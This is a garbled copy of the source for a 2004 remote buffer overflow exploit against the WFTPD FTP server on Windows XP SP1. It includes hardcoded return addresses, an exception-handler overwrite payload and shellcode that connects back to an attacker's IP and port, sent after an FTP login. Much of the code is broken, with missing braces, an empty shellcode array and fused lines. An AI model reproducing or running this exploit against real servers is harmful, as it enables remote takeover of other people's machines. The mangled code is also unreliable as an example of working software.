WFTPD Server buffer overflow Remote Exploit

                              * WFTPD buffer overflow exploit, (c) axl 2004, 
                              * Discovered by the very same guy :p
                              * Tested WFTPD versions:
                              * - WFTPD Pro Server 3.21 Release 1 (trial) (latest version)
                              * - WFTPD Pro Server 3.20 Release 2 (trial)
                              * - WFTPD Server 3.21 Release 1 (trial) (latest version)
                              * - WFTPD Server 3.10 Release 1 (trial)
                              * Tested exploit with these remote operating systems:
                              * - Windows XP Pro, SP1
                              * Should be very easy to support other Windows OSes. You may only have
                              * to update ret_addr.

                              #pragma comment(lib, "ws2_32.lib")

                              #define MAXLINE 0x1000

                              //#define OLDCODE // Try not to uncomment this...

                              #ifdef OLDCODE
                              static char* ret_addr = "\xAC\x9C\xEC\x77"; 
                              // kernel32.dll 5.1.2600.1106, (WinXP Pro SP1, EN) => pop reg / pop reg / ret
                              /* See the comment in exploit() for the reasons I chose this address */
                              static char* ret_addr = "\x5B\xC0\xEB\x77"; 
                              // kernel32.dll 5.1.2600.1106, (WinXP Pro SP1, EN) => pop reg / pop reg / ret

                              const unsigned int shlc_offs_enckey = 0x00000025;
                              const unsigned int shlc_offs_encstart = 0x0000002B;
                              const unsigned int shlc_offs_encend = 0x000001B8;
                              unsigned char shlc_code[] =

                              static char inbuf[MAXLINE];
                              static unsigned inoffs = 0;

                              const WFTPD_PRO_321_TRIAL = 0; // WFTPD Pro Server 3.21 Release 1 (trial)
                              const WFTPD_PRO_320_TRIAL = 1; // WFTPD Pro Server 3.20 Release 2 (trial)
                              const WFTPD_321_TRIAL = 2; // WFTPD Server 3.21 Release 1 (trial)
                              const WFTPD_310_TRIAL = 3; // WFTPD Server 3.10 Release 1 (trial)
                              int ftpver = WFTPD_PRO_321_TRIAL;

                              int isrd(SOCKET s)
                              fd_set r;
                              FD_SET(s, &r);
                              timeval t = {0, 0};
                              int ret = select(1, &r, NULL, NULL, &t);
                              if (ret = sizeof(inbuf))
                              printf("[-] Too long line\n");
                              return 0;
                              int len = recv(s, &inbuf[inoffs], sizeof(inbuf) - inoffs, 0);
                              if (len = len)
                              printf("[-] Too small caller buffer\n");
                              return 0;
                              memcpy(string, inbuf, nlidx);
                              string[nlidx] = 0;
                              if (nlidx > 0 && string[nlidx-1] == '\r')
                              string[nlidx-1] = 0;

                              if (nlidx + 1 >= inoffs)
                              inoffs = 0;
                              memcpy(inbuf, &inbuf[nlidx+1], inoffs - (nlidx + 1));
                              inoffs -= nlidx + 1;

                              return 1;

                              int ignorerd(SOCKET s)
                              inoffs = 0;

                              while (1)
                              if (!isrd(s))
                              return 1;
                              if (recv(s, inbuf, sizeof(inbuf), 0)  dstlen || dstoffs + srclen > 8);
                              shellcode[4] = (char)(sport >> 8);
                              shellcode[5] = (char)sport;
                              shellcode[6] = (char)(sip >> 24);
                              shellcode[7] = (char)(sip >> 16);
                              shellcode[8] = (char)(sip >> 8);
                              shellcode[9] = (char)sip;
                              for (int i = 0; i  POP REG / POP REG / RET. This is the exception handler
                              * the older versions will execute. WFTPD Pro Server 3.21 will instead execute the
                              * instructions with the bytes in that same address. In this case, it'll execute these
                              * instructions:
                              * 5B POP EBX
                              * C0EB 77 SHR BL,77
                              * 5B POP EBX
                              * C0EB 77 SHR BL,77
                              * EB 1E JMP SHORT ourcode
                              if (!add_bytes(sndbuf, sndbufidx, sizeof(sndbuf), "-WFTPD_EXPLOIT_BY_AXL_(C)_2004-", 31) || // 31-byte string
                              !add_bytes(sndbuf, sndbufidx, sizeof(sndbuf), "\x90\x90\xEB\x28", 4) || // old fs:[0] OR cookie (p321)
                              !add_bytes(sndbuf, sndbufidx, sizeof(sndbuf), ret_addr, 4) || // exception handler OR old fs:[0] (p321)
                              !add_bytes(sndbuf, sndbufidx, sizeof(sndbuf), ret_addr, 4) || // trylevel OR exception handler (p321)
                              !add_bytes(sndbuf, sndbufidx, sizeof(sndbuf), "\xEB\x1E\xFE\xFF", 4) || // (p321)
                              !add_bytes(sndbuf, sndbufidx, sizeof(sndbuf), badval, 4) ||
                              !add_bytes(sndbuf, sndbufidx, sizeof(sndbuf), badval, 4) ||
                              !add_bytes(sndbuf, sndbufidx, sizeof(sndbuf), badval, 4) ||
                              !add_bytes(sndbuf, sndbufidx, sizeof(sndbuf), badval, 4) ||
                              !add_bytes(sndbuf, sndbufidx, sizeof(sndbuf), badval, 4) ||
                              !add_bytes(sndbuf, sndbufidx, sizeof(sndbuf), badval, 4) ||
                              !add_bytes(sndbuf, sndbufidx, sizeof(sndbuf), badval, 4))
                              if (!add_bytes(sndbuf, sndbufidx, sizeof(sndbuf), shellcode, sizeof(shlc_code)-1) || // our code
                              !add_bytes(sndbuf, sndbufidx, sizeof(sndbuf), " \r\n", 3)) // req + end of line

                              if (!check_invd_bytes("shellcode", shellcode, sizeof(shlc_code)-1) ||
                              !check_invd_bytes("ret_addr", ret_addr, sizeof(ret_addr)-1) ||
                              !check_invd_bytes("sndbuf", sndbuf+5, sndbufidx-3-5))

                              in_addr a; a.s_addr = htonl(sip);
                              printf("[+] Sending shellcode which will connect to %s:%u...\n", inet_ntoa(a), sport);
                              if (!sendb(s, sndbuf, sndbufidx, 0))
                              printf("[-] Failed to send shellcode\n");
                              printf("[+] Shellcode sent successfully\n");

                              ret = 1;
                              delete shellcode;

                              if (ret == 0)
                              printf("[-] Can't exploit the vulnerability\n");

                              return ret;

                              int login(SOCKET s, const char* username, const char* userpass)
                              printf("[+] Logging in...\n");
                              int code;
                              if (!ignorerd(s) || !sends(s, "USER ", 0) || !sends(s, username, 0) ||
                              !sends(s, "\r\n", 0) || (code = get_reply_code(s))     [-u username] [-p userpass] [-v ]\n", pname);

                              int main(int argc, char** argv)

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